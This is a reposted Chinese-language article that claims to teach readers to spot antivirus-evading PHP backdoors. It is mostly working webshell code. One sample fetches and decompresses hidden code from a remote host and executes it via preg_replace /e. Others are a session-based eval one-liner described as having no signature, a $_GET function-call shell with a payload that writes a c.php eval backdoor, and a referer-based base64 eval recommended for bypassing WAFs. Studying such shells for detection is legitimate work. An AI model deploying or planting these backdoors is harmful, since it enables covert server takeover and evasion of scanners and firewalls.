教你識別簡單的免查殺PHP后門

2020-03-22 19:46:17

字體：大中小

來源：轉載

供稿：網友

tudouya 同學在FREEBUF上給出[一種構造技巧]利用http://7shell.googlecode.com/svn/make.jpg 53280b00f1e85
然后調用file_get_contents函數讀取圖片為字符串，然后substr取3649字節之后的內容，再調用gzuncompress解壓，得到真正的代碼。最后調用preg_replace的修飾符e來執行惡意代碼的。這里執行以下語句來還原出惡意樣本代碼，復制代碼代碼如下:
php
echo gzuncompress(substr(file_get_contents(sprintf('%s %s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));

無特征隱藏PHP一句話： php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '/'a/'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[/'theCode/']))' , 'a' );
將$_POST['code']的內容賦值給$_SESSION['theCode']，然后執行$_SESSION['theCode']，亮點是沒有特征碼。用掃描工具來檢查代碼的話，是不會報警的，達到目的了。
超級隱蔽的PHP后門： php $_GET [a]( $_GET [b]);
僅用GET函數就構成了木馬；
利用方法：
a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};執行后當前目錄生成c.php一句話木馬，當傳參a為eval時會報錯木馬生成失敗，為assert時同樣報錯，但會生成木馬，真可謂不可小視，簡簡單單的一句話，被延伸到這般應用。
層級請求，編碼運行PHP后門：
此方法用兩個文件實現，文件1
php //1.php header( 'Content-type:text/html;charset=utf-8' ); parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); if (reset( $a ) == '10' && count ( $a ) == 9) { eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6)))));
通過HTTP請求中的HTTP_REFERER來運行經過base64編碼的代碼，來達到后門的效果，一般waf對referer這些檢測要松一點，或者沒有檢測。用這個思路bypass waf不錯。我們以一個學習的心態來對待這些PHP后門程序，很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。PHP教程

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。

上一篇：PHP根據session與cookie用戶登錄狀態操作類的代碼

下一篇：PHP入門到精通（一）：登錄消息驗證